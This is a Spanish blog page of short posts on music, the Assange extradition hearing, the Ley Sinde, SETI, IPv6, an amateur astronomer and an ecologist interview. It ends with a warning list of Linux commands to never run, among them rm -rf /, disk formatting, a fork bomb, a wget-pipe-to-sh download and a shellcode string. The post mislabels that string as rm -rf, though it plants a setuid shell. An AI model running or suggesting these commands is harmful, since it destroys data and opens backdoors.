Blogia

Jane's Addiction - Superhero

Jane's Addiction - Superhero

Jane's Addiction - Superhero ..lo siento pero esta no podia faltar de los Jane's

Assange se niega a pasar por un "juicio secreto" en Suecia

Assange se niega a pasar por un "juicio secreto" en Suecia

porque se lo quieren quitar como sea...claro como no  se esconde como el obama ese bin laden ...La defensa de Julian Assange tiene ante sí una tarea complicada: impedir que se conceda su extradición a Suecia a través de un procedimiento entre los estados europeos la euroorden que recibe luz verde en la inmensa mayoría de los casos.

En la primera jornada de las dos de las que se compone la vista de extradición, el letrado Geoffrey Robertson explicó al tribunal que la petición es exagerada porque el editor de Wikileaks ni siquiera ha sido procesado por un presunto delito de violación y abusos sexuales, y está dispuesto a volver a declarar ante la Fiscalía sueca.

Al mismo tiempo, Robertson denunció que las condiciones en que se realizaría un futuro juicio no están a la altura de las exigencias de la Justicia británica. Los juicios por violación en Suecia "se celebran habitualmente en secreto y a puerta cerrada, lo que supone una flagrante denegación de la justicia".

El otro frente jurídico consiste en negar que los delitos por los que se le persigue en Suecia aparezcan exactamente en la legislación británica. La defensa cree que ese es el caso de tres de los cargos, por abusos sexuales y coerción física. En la ley inglesa, la acusación equivalente —asalto sexual— obliga a que no haya consentimiento en las relaciones sexuales, que sí existió, según la defensa.

En relación a la acusación de violación, el abogado precisó que se le acusa de "violación menor" en Suecia existen tres niveles de gravedad en la violación, un concepto desconocido en Reino Unido.

Robertson intentó también cuestionar los motivos de la fiscal sueca Marianne Ny que lleva el caso. Para ello, llamó a declarar a Brita Sundberg-Weitman, exjueza de la Corte de Apelaciones de Suecia.

La magistrada hizo un ataque furibundo contra Ny: "Siempre da por hecho que los acusados son culpables. Creo que está tan preocupada por la situación de las mujeres agredidas y violadas que ha perdido el equilibrio".

Las conferencias

La fiscal que representa a la Fiscalía sueca en la vista de Londres se ocupó de desacreditar después el testimonio de la exjuez. Le preguntó por las pruebas que tenía para hacer tales acusaciones, y Sundberg-Weitman sólo pudo referirse a las conferencias que Ny da sobre violación en Suecia. No parecía que eso pudiera descalificarla a ojos del tribunal.

La defensa también envió al estrado a un bloguero sueco, que explicó cómo una de las dos mujeres que acusan a Assange borró varios mensajes en Twitter muy poco compatibles con una acusación tan grave como la de violación.

Si bien eso es un hecho comprobado, la tramitación de la euroorden no obliga al tribunal británico a juzgar sobre el contenido del caso, sino simplemente a considerar la petición de extradición. En su turno, la fiscal destacó que la violación es uno de los 32 delitos por los que es lícito solicitar la extradición. Assange está además acusado de tener relaciones con una mujer sin condón, a pesar de que ella le dijo que el preservativo era necesario.

"Al utilizar la violencia, Assange obligó a A. a ponerse debajo, restringió su libertad de movimientos, le agarró de los brazos, separó por la fuerza las piernas y se puso encima", dijo la fiscal para demostrar que en ningún momento hubo consentimiento.

La vista continuará hoy. El juez podría comunicar después su veredicto o tomarse un tiempo para deliberar. Ambas partes tienen derecho a recurrir la decisión ante una instancia superior. A la salida del tribunal, Assange dijo que durante los últimos meses su vida ha estado dentro de una "caja negra" que lleva inscrita la palabra violación: "Espero que mañana [por hoy] comprobemos que esa caja está vacía y que no tiene nada que ver con lo que han escrito por fuera".

Recuérdales que tu voto cuenta, decir NO a la ley Sinde definitivamente

Recuérdales que tu voto cuenta,  decir NO a la ley Sinde definitivamente

A pesar de las protestas y el nulo apoyo ciudadano, y tras haber caído en el Congreso, el PSOE intenta de nuevo aprobar la ley Sinde en el Senado el próximo miércoles (9 de febrero). xMailer es una aplicación web de democracía directa participativa, consiste en un código HTML que puedes integrar en tu web para que cualquier ciudadana/o pueda enviar un mail a los senadores del PP en cuyas manos está el que la ley Sinde sea o no aprobada. Puedes usar el siguiente formulario para enviar un mensaje automáticamente a todos los senadores del PP o copiar el código del formulario para pegarlo directamente en el de tu web o blog.

 Esta ley esconde entre sus páginas una de las leyes más represivas que puede sufrir internet, la llamada Ley Sinde (diseñada por la SGAE y la Industria Cultural). Una ley que el Partido Popular (y probablemente otros grupos parlamentarios) están a punto de apoyar dando un giro irreversible a la libertad de expresión en Internet. Actúa rápidamente para evitarlo, exige a los representantes y a las bases de tu partido que apoyen las enmiendas para modificar la disposición final segunda de la Ley de Economía Sostenible (ley Sinde). Muéstrales tu preocupación ante estos hechos y exige que se posicionen públicamente en contra.

Las negociaciones que el PSOE está llevando a cabo con el resto de los grupos siempre han sido opacas, cerradas al escrutinio público y a la participación ciudadana (como convendría a un régimen verdaderamente democrático). Las consecuencias de esas negociaciones pueden tener efectos devastadores sobre la libertad del conjunto de la ciudadanía. Es el caso de la Ley de Economía Sostenible. Si bien es cierto que España puede necesitar un cambio de modelo económico, el ejecutivo de Zapatero, con la complicidad del PP intenta colar por la puerta de atrás una de la leyes más polémicas de esta legislatura: la llamada Ley Sinde, integrada en la LES (Ley de Economía Sostenible), como Disposición Final 2ª. Dicha propuesta de ley incendió la a los internautas a principios del año porque permitiría el cierre de cualquier web que aloje enlaces a contenidos con copyright, sin orden judicial, sin juicio previo y a petición de una comisión compuesta por las industrias culturales, abanderadas por la SGAE y las grandes discográficas. Infórmate de las implicaciones de esta ley

Estas son las consecuencias que tendrá esa ley:

  • Cierre de webs y medios de comunicación sin orden judicial por un comité seleccionado a dedo por la industria multinacional del entretenimiento.
  • Privación de garantías judiciales a medios de comunicación, podrán cerrarlos sin seguir el procedimiento judicial ordinario.
  • Comités de expertos censores que no tienen que demostrar ninguna experiencia, amiguismo arbitrario que da poder a gente sin preparación demostrada para censurar y cerrar páginas web y medios de comunicación.
  • Ministerio de cultura recibiendo listas de webs a cerrar desde el multinacionales en el extranjero que clausurar.
  • Más de 2000 páginas web de La Lista de Sinde pueden ser clausuradas de inmediato.

 

Es un hecho sin precedentes en toda Europa. Una ley diseñada a medida del lobby de las industrias culturales agrupadas en La Coalición. Durante esta semana los senadores tienen en sus manos la libertad en la red. Sabemos que no hay libertad de ningún tipo sin libertad de expresión. Exprésale a los senadores tu preocupación por su votación a las enmiendas contra la Ley Sinde, que sea transparente y que nos diga si va a vender una libertad para comprar, dudosamente, otra (o simplemente para satisfacer sus necesidades de partido). Llama a las sedes locales de tu partido exigiendo que tu partido no puede quedarse callado frente al atropello a los derechos civiles que va a cometer el PSOE, sino que debería posicionarse radicalmente en contra o no tendrás motivos para votarles. Escribe también correos por tu cuenta directamente a tus representantes locales para pedirles que se pronuncien contra de la "Disposición Final 2º de la Ley de Economía Sostenible" y que así deseas que lo representen los senadores de tu partido en el Senado.

 

 

 

 

Alcance de las ondas de radio de la humanidad en la galaxia

Alcance de las ondas de radio de la humanidad en la galaxia

Alcance de las ondas de radio de la humanidad en la galaxia .La humanidad lleva emitiendo ondas de radio al espacio profundo desde hace unos 100 años. Eso, por supuesto, significa que es una burbuja que siempre se va a expandir, anunciando nuestra presencia a cualquiera que escuche en la Vía Láctea. La burbuja es astrómicamente hablando, grande (literalmente), y actualmente se expande por unos 200 años luz. Pero, ¿como de grande es comparado con la galaxia en la que vivimos (que a su vez es una de las incontables galaxias del universo observable)? (Hacer clic en el enlace y veras la  imagen para ampliarla y poder apreciarlo mejor...es precioso

http://jackadam.net/misc/radio_broadcasts/radio_broadcasts.jpg

Black Crowes w Jimmy Page 10 Years Gone led zeppelin

Black Crowes w Jimmy Page 10 Years Gone led zeppelin

Black Crowes w Jimmy Page 10 Years Gone led zeppelin.......

Jethro Tull - Flauta Solo Improvisation

Jethro Tull - Flauta Solo Improvisation

Jethro Tull - Flute Solo Improvisation (God Rest Ye Merry Gentlemen/Bouree)...................................que me decis si o no HEEEEEEEEEEE.BUENISIMOS...

¿Qué ocurrirá cuando China gobierne el mundo?

¿Qué ocurrirá cuando China gobierne el mundo?

El académico y periodista británico Martin Jacques ha publicado recientemente un libro que tiene el revelador título When China Rules the World (Cuando China gobierne el mundo), en el cual sostiene que si alguien piensa que China se integrará rapidamente al sistema neoliberal del capitalismo mundial, se llevará una gran sorpresa. China no sólo será una superpotencia económica en las próximas décadas, sino que el orden mundial que construirá será muy diferente al implantado por Estados Unidos.

Los europeos y estadounidenses suponen ingenuamente que China replicará el modelo económico vigente a medida que su economía se desarrolle y su población acceda a mayor consumo. Sin embargo, eso es solo una ilusión. Los chinos tienen una concepción distinta de la sociedad y la política: se centran en la comunidad más que en el individuo, en el estado más que en un sistema liberal, en el autoritarismo más que en la democracia. China tiene 4.000 años de historia como civilización con características propias de las cuales puede sacar fuerzas. No se doblegará sencillamente bajo los valores e instituciones occidentales.

Los aportes de Martin Jacques coinciden en varios aspectos con el informe Global Trends. Un orden mundial centrado en China reflejará los valores chinos, y es muy probable que Beijing opaque a Nueva York, y el cine chino opaque a Hollywood, sin hablar que el yuan se hará más sólido que el dólar. De esta misma manera, los niños del mundo aprenderán sobre los viajes del conquistador Zheng He por la costa oriental de África, tanto o más que sobre los viajes de Vasco de Gama o Cristóbal Colón.

 

Pero antes que cualquiera de estas cosas pueda ocurrir, China deberá continuar su proceso de crecimiento económico, cohesión social y unidad política, temas que son complejos y ante lo cual no hay nada seguro. En China subyacen profundas tensiones, desigualdades y brechas que pueden fácilmente conducir al descarrilamiento. En algunos períodos, las fuerzas centrífugas también los han conducido al caos y la desintegración.

La estabilidad China depende de manera fundamental de la capacidad de su gobierno para alcanzar logros económicos de los cuales pueda beneficiarse la gran mayoría de la población. Durante los últimos 30 años, China ha logrado sacar de la pobreza a 500 millones de chinos, quedando aún una porción muy significativa de pueblos rezagados. Es ahí donde China tiene el desafío: lograr que su modelo de desarrollo erradique la pobreza y genere el máximo bienestar colectivo. Temas que aún se encuentran en niveles muy incipientes.

En enero del año pasado hablé del libro de Martin Jacques When China Rules the World (Cuando China gobierne el mundo), en el cual planteaba las ideas centrales de este gran investigador y académico británico. Como idea central del trabajo destaqué que China no sólo será una superpotencia económica en las próximas décadas, sino que el orden mundial que construirá será muy diferente al implantado por Estados Unidos..

En esta ocasión, cuelgo este video donde Martin Jacques da a a conocer los fundamentos de su trabajo, y explica por qué China será la primera economía del planeta el año 2020. Una de las razones que Martin Jacques deja en claro, es que la arrogancia de occidente llegó al extremismo de negar la existencia de China y otros países. Durante 200 años, el ciclo completo del dominio occidental, China simplemente desapareció de todos los mapas.

 Una de las razones que confirma las tesis de Martin Jacques es que China nunca fue pensado como un rival para el consumo occidental. Siempre occidente vio a China como un país de campesinos y a su pueblo dispuesto al trabajo por un plato de arroz. El error que oculta esta idea hoy lo estamos pagando caro. Los chinos también comen, y gran parte del problema alimentario que comienza a vivirse es porque tanto chinos como indios, malasios e indonesios, consideran que ha llegado el momento de alimentarse mejor.

La charla de Martin Jacques (21 minutos) es altamente recomendable para prepararse a lo que viene. Como señalé en el post de enero de 2010:

Los europeos y estadounidenses suponen ingenuamente que China replicará el modelo económico vigente a medida que su economía se desarrolle y su población acceda a mayor consumo. Sin embargo, eso es solo una ilusión. Los chinos tienen una concepción distinta de la sociedad y la política: se centran en la comunidad más que en el individuo; en el estado más que en un sistema liberal; en el autoritarismo más que en la democracia. China tiene 4.000 años de historia como civilización con características propias de las cuales puede sacar fuerzas. No se doblegará sencillamente bajo los valores e instituciones occidentales.

Y como recuerda Martin Jacques: “ya Adam Smith escribió en el siglo XVIII que el mercado chino es más grande, más desarrollado, y más sofisticado que cualquiera de Europa”. Y pone como ejemplo la construcción del Gran Canal de 1.800 kilómetros que une Beijing con Shanghai y que se construyó entre los siglos V A.C y VII D.C, es decir durante 1.200 años.

La charla de Martin Jacques es altamente recomendable para prepararse a lo que viene y para romper muchos mitos que nos atrapan en la ignorancia y el desconocimiento absoluto. Sugiero buscar los subtítulos en español, y clickar en el botón superior derecho para ver en pantalla completa.

fuente:

En El Blog Salmón | ¿Qué ocurrirá cuando China gobierne el mundo?

Una señal SETI anómala

Una señal SETI anómala

Hay una posibilidad, muy pequeña por cierto, de que proceda de una inteligencia extraterrestre (ver la imagen al pie de la entrada). Los colores brillantes sobre el fondo azul indican que una señal anómala fue recibida aquí, en la Tierra, por un radiotelescopio que participa en el programa de Búsqueda de Inteligencia Extraterrestre (SETI, por las iniciales de Search for Extraterrestrial Intelligence)

Varios grupos realizaron investigaciones sobre estas señales, entre los que se cuentan miembros de la Liga SETI. En el gráfico mostrado más arriba, el eje vertical corresponde al tiempo y el eje horizontal a las frecuencias. Aunque esta potente señal nunca se identificó de manera positiva, los astrónomos reconocieron en ella numerosas características propias de un origen más vulgar y, en última instancia, terrestre. En este caso, lo más probable es que la señal procediera de una modulación inusual entre un satélite GPS y una fuente terrestre no identificada.

No es el único incidente, ya que hay numerosas señales extrañas procedentes del espacio cuyo origen se desconoce. Sin embargo, hasta ahora ninguna señal ha sido lo suficientemente potente o prolongada —la mostrada arriba, por ejemplo, es muy breve— como para que pueda ser identificada claramente como procedente de una inteligencia extraterrestre.

Mensaje enviado por el Observatorio de Arecibo hacia M13. Aun cuando esta cadena de unos y ceros sea recibida, M13 está tan lejos que tendríamos que esperar casi 50 mil años para recibir una respuesta. El mensaje recopila algunas hechos simples acerca de la humanidad y el nivel de conocimiento alcanzado: de izquierda a derecha figuran los números del 1 al 10, algunos átomos como el hidrógeno y el carbón, varias moléculas interesantes, el ADN, un ser humano con una descripción, hechos básicos del Sistema Solar y del telescopio que envió la señal .

Vía Foto astronómica del día correspondiente al 6 de febrero de 2011. Esta página ofrece todos los días una imagen o fotografía del universo, junto con una breve explicación escrita por un astrónomo profesional. Crédito y copyright: SETI League.

(*) Para evitar malentendidos, tomen en cuenta que la recepción de esta señal de origen desconocido no es reciente, sino que fue recibida hace más de diez años. Entiendo que la entrada se vuelve a publicar en razón de los extraordinarios resultados preliminares del Telescopio Espacial Kepler sobre exoplanetas y todo lo que esto puede significar para la hipótesis sobre la existencia de vida extraterrestre. A propósito, las páginas de SETI League están caídas, sólo espero que el desperfecto sea pasajero (de cualquier manera pueden consultarlas en el caché de Google).

Internet se hace infinita

Internet se hace infinita

La inmensa cantidad de direcciones IPv6 iniciará una nueva era de máquinas interconectadas. Las grandes compañías españolas apenas usan el nuevo protocolo.Hace dos días se repartieron las últimas direcciones IP que quedaban. En unos meses, las reservas de los operadores empezarán a agotarse. Y en un año, si no se ha empezado la transición a un nuevo protocolo, internet comenzará a estancarse. Aunque las grandes de internet, las administraciones públicas y telecos dicen estar preparadas, los expertos lo dudan.

El jueves, la IANA (la autoridad que controla las direcciones IP que identifican a cada máquina en la red) repartió los últimos cinco lotes a los registradores regionales. Al RIPE, que abarca Europa, Asia central y Oriente Medio, le tocaron unos 16 millones de direcciones IPv4; es decir, de la versión actual. Este organismo las redistribuye después a los operadores. Cuando estas se agoten (en el mejor de los casos, a comienzos de 2012), cada nueva página, cada nueva conexión a internet o cada móvil tendrá que usar la nueva numeración que provee el protocolo IPv6.

Este sistema permitirá a un usuario doméstico tener tantas direcciones como toda la internet actual. El responsable de ARIN, el registrador regional para la América anglosajona, John Curran, usó la siguiente metáfora para ilustrar el cambio de magnitud: "Si todo el espacio de IPv4 fuera como una pelota de golf, IPv6 tendría el tamaño del Sol", dijo a Reuters. Esta vez no se agotarán tan pronto. El sistema anterior fue ideado por el equipo de Vinton Cerf, uno de los padres de internet. Entonces, parecieron suficientes las casi 4.300 millones de combinaciones que permite IPv4. Eso fue en 1981, cuando apenas había unos miles de máquinas gestionadas por ingenieros.

Servicios en Japón

La cantidad tiene sus ventajas. "Habrá direcciones para todos y para todo", explica el director de preventa de NTT Europe, Álvaro Cabrera. La compañía, la principal telefónica de Japón, fue de las primeras en ensayar con el IPv6 y ya ofrece varios servicios comerciales sobre el nuevo protocolo. Asia, con la pujanza demográfica de China y de productos nipona, es un gran consumidor de direcciones IP. Pero, en los primeros años del sistema, el reparto de las direcciones que se hacía desde EEUU fue alocado e injusto. Muchas de las grandes empresas recibieron lotes enteros de números IPv4. La Universidad de Stanford, por ejemplo, tenía más que toda China. De hecho, sólo el 14% de aquellos 4.300 millones de direcciones están siendo usadas. El problema es que, por razones técnicas, recuperar las ociosas es muy complicado.

"La transición entre ambos protocolos no es muy costosa", explica Cabrera. El cambio del primer sistema, el IPv2 al IPv4 en 1981, se hizo en una sola noche [las versiones de los protocolos saltan de dos en dos]. Pero, en esta ocasión no se puede producir el apagón de un día para otro. Hoy hay miles de millones de máquinas en la red, entonces eran unos pocos miles. La solución por la que se ha optado es lo que llaman la doble pila. Un servidor web, por ejemplo, sirve su contenido en los dos protocolos. "Una red no se ve con la otra", aclara Cabrera. Esto hará que durante unos años ambos sistemas convivan.

Seguridad entre conexiones

Otra de las ventajas del nuevo sistema es la autoconfiguración. El protocolo está diseñado para que las máquinas se puedan conectar entre sí sin intervención de los operadores. Igual de importante es la seguridad. IPv6 permite la autenticación (saber que el destinatario del contenido es quien dice ser) y hay seguridad desde un extremo de la conexión al otro. Por último, está la movilidad IP. Este sistema permitirá, por ejemplo, iniciar una llamada en internet (voz sobre IP) y, si se sale de casa, continuarla por red móvil GSM sin perder la conexión.

Las grandes empresas de contenidos ya están preparadas. "Microsoft y todos sus productos ya llevan IPv6 nativo", dice Luis Miguel García Oliva, director de Estrategia y Plataforma de Microsoft Ibérica. Todo producto que, de alguna manera u otra, tenga conectividad, necesita ser compatible con el IPv6. Los programas P2P, como BitTorrent, son compatibles desde hace años. Google, Yahoo o Facebook ya tienen todo listo.

Sin embargo, las cifras dicen que un sistema que se instauró en 1999 para anticipar lo que está pasando ahora apenas se usa. Según el director de operaciones de Red. es, la entidad que gestiona los nombres de dominio españoles, Carlos Cano, "el tráfico IPv6 en España es prácticamente nulo". De hecho, aunque ya hay unas 300 grandes instituciones con soporte IPv6, sólo lo usan el 1,7%, según el Observatorio IPv6. "Las redes están desplegadas, pero no se utilizan", comenta Cano.

"El problema está en los operadores, no están preparados", asegura el director técnico de Consulintel, Jordi Palet. Este experto lleva predicando en el desierto más de diez años. A comienzos de la década organizó varias cumbres mundiales sobre IPv6 en Madrid y Barcelona. Ha asesorado a muchas empresas y Gobiernos en la transición, pero fuera de España. Y, sin embargo, su consultora ahora no deja de trabajar. "Es un problema que se han buscado ellos pero lo pagaremos nosotros", advierte.

Las operadoras, como Jazztel, están haciendo pruebas con IPv6. Ya reciben direcciones del nuevo protocolo cuando piden un lote de IPv4. Telefónica incluso hizo ensayos hace más de una década. "Y sin embargo no han hecho el trabajo", opina Palet. Aunque aducen el coste, este es, por cliente, de unos céntimos, según Consulintel. "Ahora habrá que formar en dos años a 20 millones de ingenieros", recuerda Palet.

De no hacerlo, puede que se frene la ola de creatividad que, auguran los expertos, traerá IPv6. "No habrá los problemas de gestión de las redes que hay hoy". Las direcciones IP, como granos de arena en el desierto, se pondrán en todo ser vivo, máquina o producto humano (ver apoyo). Sin IPv6, la anunciada internet de las cosas, donde las máquinas interactuan sin intervención humana, no será posible.

Claves

Coches, sensores de terremotos y vacas conectadas

Vacas con dirección IP
Japón es, con gran diferencia, el país que mas adelantado lleva el uso del protocolo IPv6. Esto le está permitiendo explorar posibilidades que en Europa parecen aún lejanas. Una de ellas, iniciada como experimento en 2002, es colocar sensores con una dirección IPv6 a las vacas. El ensayo, que se está llevando a cabo en varias granjas, pretende monitorear a la res y su carne durante todo su crecimiento y tratamiento posterior hasta que llega a los hogares para su consumo. La conectividad del animal con este protocolo no necesita de la intervención de técnicos: toda la comunicación se puede establecer con las máquinas.

Coches de lujo con red
Los coches actuales, en especial los de alta gama, pueden llevar hasta 30 dispositivos electrónicos. Algunos ya tienen conexión a internet para el entretenimiento de los ocupantes. Pero en el futuro se podrá controlar el estado del coche a distancia. Hoy, con tanto aparato y sensor, el vehículo necesitaría una especie de router en el interior, lo que encarece la idea. Pero, como ya está haciendo BMW en sus automóviles, IPv6 permitirá asignar direcciones a cada parte: control de estabilidad, dispositivos multimedia, cuadro de mandos, etc. Y después de BMW vendrás las otras marcas. Cada año salen de las factorías varias decenas de millones de coches. Con IPv4, sería imposible darles estas direcciones de usar y tirar, aunque las investigaciones comenzaron aplicando esta tecnología.

En caso de emergencia
En el caso de una catástrofe o un gran atentado, los servicios de emergencia llegan al lugar y se apelotonan. Como se demostró en Madrid el 11-M, la comunicación entre policía, bomberos, sanitarios o protección civil se convierte en algo clave. En EEUU, el proyecto MetroNet6 trabaja en un sistema basado en IPv6 que, gracias a la autoconfiguración que ofrece este protocolo, permitiría crear una red de comunicaciones ‘ad hoc’. A medida que nuevas unidades llegan al lugar del siniestro, se añaden a la red de forma automática. También en EEUU, la Armada está aplicando direcciones IP a cada suministro. Esto le permite saber dónde va a hacer falta más munición o nuevas ruedas.

Sensores de terremotos
Desde hace años, la Agencia de Meteorología de Japón, en colaboración con la compañía de telecomunicaciones NTT, está desplegando una amplísima red de sensores por todo el país, incluida la costa, para levantar una red de alerta temprana de terremotos. Los miles de sensores llevan direcciones IPv6. El sistema centraliza cualquier atisbo de seísmo y, en cuestión de segundos, puede calcular el origen del temblor y la dirección que va a tomar. Diez o veinte segundos después de detectar esta amenaza, la agencia decide si debe lanzar una alerta a los ciudadanos en mutidifusión, también gracias al uso del protocolo IPv6. Los suscriptores de este servicio reciben el aviso con la intensidad y el tiempo aproximado que falta para que el terremoto llegue a su zona. El servicio fue lanzado en julio de 2007. 

Since I've Been Loving You - Led Zeppelin

Since I've Been Loving You - Led Zeppelin ............sin palabras es una obra de arte superior a muchos seres

pastor que ayuda a la NASA

pastor que ayuda a la NASA

En el pueblo y, sobre todo, en el mundillo astronómico internacional, Joaquín es conocido como 'El pastor galáctico', denominación que él mismo ha fomentado y que, por impactante, no se olvida. "Lo del pastor galáctico salió de mí. En los foros no se creían que yo fuese ganadero de ovejas y supiera algo de esto. La gente del pueblo ya sabía de mi afición porque cuando salía al campo con las ovejas me llevaba libros y revistas y siempre salía el tema. Después, cuando empecé a construir el observatorio, pensaron que era un silo para el pienso, después que si era algo para curar chorizos. Al final, salió esto", dice entre risas. "No deja de ser una curiosidad que el único observatorio que había en Zamora lo hubiese construido un pastor", reconoce.
Completamente integrado en su vivienda, la cúpula de observatorio es una de las referencias del 'skyline' de San Agustín del Pozo. El nombre de la instalación responde a los gustos por una de las constelaciones más conocidas del mapa estelar. "Orión es la constelación que más me gusta y donde está una de las nebulosas más llamativas y bonitas del cielo de invierno, la nebulosa M42", indica.
La estructura de la cúpula es de hierro, forrada por fuera con chapa galvanizada y por polietileno expandido en el interior para proteger del frío y del calor el observatorio, que tiene unos tres metros y medio de diámetro y una abertura de cerca de uno metro. El resultado es francamente bueno, optimizando la inversión hasta el extremo, no en vano hizo él mismo la obra, invirtiendo en materiales unas 400.000 pesetas "de las de entonces".
Escaleras arriba, la primera precaución es cerrar la trampilla de acceso para evitar accidentes. El pastor galáctico abre la tronera para hacer una demostración de las posibilidades de su obra y prepara el telescopio tipo 2, "con una montura normal, pero es muy potente para cielo profundo porque tiene 30 centímetros de diámetro, tiene poco foco y da más luminosidad", según explica.
El equipo óptico queda completado con un ordenador, una cámara digital, un amplio juego de filtros y de oculares y otros dos telescopios refractores, "de 150 milímetros, foco 8, y otro de 120, foco 5, para observación con mis amigos en el campo y para exhibiciones por los pueblos", puntualiza. "Fíjate. Este cristalito de nada, cien euros. Es un filtro para ver nebulosas de emisión de hidrógeno. Éste es un polarizador para la Luna", detalla, comentando que le falta el espectrógrafo de masas.
El pastor saca con cuidado los pernos que sujetan la cúpula para hacer una demostración de cómo puede moverse 360 grados con facilidad, gracias a los rodamientos que él mismo colocó. "La NASA y la Agencia Espacial Europea nos piden ayuda con cierta frecuencia porque no pueden cubrir todo el campo. Piensa que un aficionado australiano descubrió con un telescopio normal y corriente que un asteroide se había estrellado con Júpiter y la NASA apuntó el Hubble hacia ese punto para ver el punto de impacto. Si llega a dar contra la Tierra, la barre", explica.
Joaquín Tapioles tiene sus preferencias en cuanto al objeto de sus estudios, dedicándose, sobre todo, a los cometas. Cuando estrenó su observatorio Orión, pasaron relativamente cerca de la Tierra el Yakutake y el Hale-Bopp, que se vio casi durante medio año, según indica. "Es una emoción muy grande seguirlo paso a paso, sacarle fotos y comprobar la evolución de su coma, las espirales de chorros de gas y polvo según iba girando la órbita… Lo puedes ver con tus propios ojos y eso es genial".

La especie humana es como una plaga y la extinción parece ser su destino

La especie humana es como una plaga y la extinción parece ser su destino

 ­­Ecologista con un amplio bagaje a sus espaldas, activista de la organización Greenpeace durante veintitrés años, los diez últimos como director ejecutivo, Juan López de Uralde presentó ayer en el Club Diario de Mallorca su libro El planeta de los estúpidos, "una visión personal de los problemas medioambientales", revela. No oculta que en el programa de EQUO, su futura formación política, figurará el cierre definitivo de todas las centrales nucleares. "Es algo que está en el adn de todo ecologista", recalca.

Juan López de Uralde, durante su intervención de ayer tarde en el Club Diario de Mallorca.

 

 

 

 

 

Juan López de Uralde, durante su intervención de ayer tarde en el Club Diario de Mallorca.  Lorenzo

—¿Qué nos ofrece en su libro?
—El planeta de los estúpidos es una visión personal de los problemas medioambientales: el cambio climático, la escasez de agua, el tratamiento de los residuos y la alarmante pérdida de biodiversidad. Comienza en la cumbre del clima de Copenhague y el hilo me lleva a los veinticinco años que llevo militando en movimientos ecologistas. Describo los orígenes de cómo me involucré en esta lucha.
—¿Cuál es el objetivo de EQUO?
—EQUO es un proyecto liderado por diversas personalidades de la sociedad civil a los que no satisfacen las soluciones que dan los partidos políticos a nuestras preocupaciones actuales. Se trata de construir un proyecto político en el espacio verde.
—Aspiran a conseguir el diez por ciento de los votos en las elecciones generales de 2012. ¿No le parece que es una expectativa demasiado ambiciosa?
—No aspiramos al diez por ciento de los votos en nuestra primera presencia electoral. Lo que hemos dicho es que en Europa los partidos verdes se mueven en esos porcentajes y no creo que en España haya una conciencia ecológica menor que en el resto del continente. Por eso aspiramos a captar a ese diez por ciento del electorado a medio plazo.
—¿Qué colectivos agrupa?
—Organizaciones no gubernamentales de ayuda al desarrollo, de lucha contra la pobreza, gente del mundo sindical... Un amplio espectro de personas de la sociedad civil.
—¿Qué propone su partido?
—Apostamos por la ecología y la equidad y por un modelo energético basado en un cien por cien en las energías renovables. La clave del éxito será convencer al electorado de que desde lo verde también se pueden dar soluciones a la crisis económica. Impulsando los sectores de las energías renovables o la agricultura ecológica, por ejemplo. Debe haber una nueva ordenación del mercado laboral que, básicamente, debe consistir en trabajar menos para trabajar todos. Porque sabemos que va a ser muy difícil generar millones de empleos en el futuro.
—¿En qué situación se encuentra su pleito con los tribunales daneses tras el incidente en Copenhague?
—Estamos exactamente igual al día en que volví de Copenhague tras permanecer 21 días encarcelado, pendiente de la formulación de cargos por parte de la fiscalía.
—¿Se arrepiente de esa acción? (Se coló en una recepción que ofrecía la reina de Dinamarca a los jefes de Estado y de Gobierno asistentes a una cumbre climática y desplegó una pancarta)
—No. Hicimos lo que teníamos que hacer y fue un acto que tuvo mucha repercusión mediática.Indudablemente también tuvo su lado oscuro. Esos 21 días que pasé en la cárcel.
—¿Qué trato le dieron?
—No me pegaron ni me torturaron, pero sigo creyendo que fue un castigo desproporcionado. Me aislaron sin dejarme leer la prensa, navegar por internet o comunicarme con personas en el exterior. Y la falta que había cometido se limitaba a entrar en una fiesta sin invitación. Y por esto nos trataron como a terroristas.
—La cumbre climática de Copenhague fue un fracaso. ¿Está la especie humana cavando su propia fosa con su actitud?
—Nuestro comportamiento como especie no está en equilibrio con su medio. Somos como una plaga que usa los recursos hasta su esquilmación y su destino parece ser el de la extinción.
—Cristina Narbona, Elena Espinosa y Rosa Aguilar. ¿Cuál es en su opinión la mejor ministra de Medio Ambiente?
—Sin lugar a dudas Cristina Narbona ha sido la mejor ministra de Medio Ambiente de la democracia, la única que intentó seriamente llevar a cabo políticas medioambientales en el país. Impulsó leyes y decisiones como la de derribar el Algarrobico para preservar el litoral, aunque finalmente no se pudo llevar a cabo.
—Centrales nucleares. ¿Hay que acabar con esta forma de producir energía?
—Por supuesto que sí. Este será un punto clave de mi programa electoral, el cierre definitivo de todas las centrales nucleares. Este es una cuestión que está en el adn de todo ecologista. Y el cierre de estas centrales no sólo es necesario sino que también es posible. Reemplazando esta forma de producir energía con las renovables.

7 comandos que jamás debes ejecutar en Linux.

7 comandos que jamás debes ejecutar en Linux.

 Hay algunos que tenemos pavor de que algún día nuestro GNU/Linux truene si eres nuevo en esto de Linux, las oportunidades de que alguién te engañe diciendote que uses algún comando para destruir tu sistema son muy altas, por eso es bueno conocer los comandos más peligrosos para GNU/Linux, en Tech Source from Bohol hay un listado de los 7 comando más mortales para Linux, (traducción en Nierox) , algunos de estos comandos pueden formatear el disco duro, dañar los archivos, etc.

Navegando en la red encontramos lo siguiente:

  1. rm -rf /
    Este comando borrará de manera recursiva y convincente todos los archivos en el directorio raíz, aquí tienes un video para ver en acción el comando rm -rf /.

  2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p
    release */
    = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
    “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
    “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
    “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
    “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
    “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
    “x6ex2fx73x68x00x2dx63x00″
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    Esta es la versión hexadecimal de rm-rf / que pueden engañar hasta a los usuarios expertos de Linux.

  3. mkfs.ext3 /dev/sda
    Este comando formatea la partición que se menciona después de mkfs.

  4. :(){:|:&};:
    A este comando se le conoce cómo bomba fork, ejecutar un gran número de procesos hasta que el sistema se congela. Esto puede conducir a la corrupción de datos.

  5. cualquier_comando > /dev/sda
    Este comando provoca perdida total de datos, en la particion que se menciona en el comando

  6. wget http://alguna_fuente_no_confiable -O- | sh
    Esto descarga paquetes de alguna fuente no confiable y la ejecuta, debes tener mucho cuidado ya que puede ser código malicioso

  7. mv /home/tu-carpeta-home/* /dev/null
